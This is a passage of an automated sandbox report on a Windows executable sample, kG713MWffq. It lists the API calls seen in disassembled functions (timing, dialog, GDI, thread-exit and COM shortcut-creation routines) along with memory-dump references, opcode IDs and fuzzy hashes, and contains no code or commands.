                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                                        • String ID:
                                                                                        • API String ID: 2338827641-0
                                                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                        • String ID:
                                                                                        • API String ID: 4023252218-0
                                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1489400265-0
                                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                        APIs
                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 1042038666-0
                                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                        • __getptd.LIBCMT ref: 00417826
                                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                                        • __lock.LIBCMT ref: 00417844
                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                        • String ID:
                                                                                        • API String ID: 938513278-0
                                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                        APIs
                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                        • String ID:
                                                                                        • API String ID: 2403457894-0
                                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                        APIs
                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                        • String ID:
                                                                                        • API String ID: 4247068974-0
                                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )$U$\
                                                                                        • API String ID: 0-3705770531
                                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                        APIs
                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 886957087-24824748
                                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \
                                                                                        • API String ID: 4104443479-2967466578
                                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \
                                                                                        • API String ID: 4104443479-2967466578
                                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \
                                                                                        • API String ID: 4104443479-2967466578
                                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
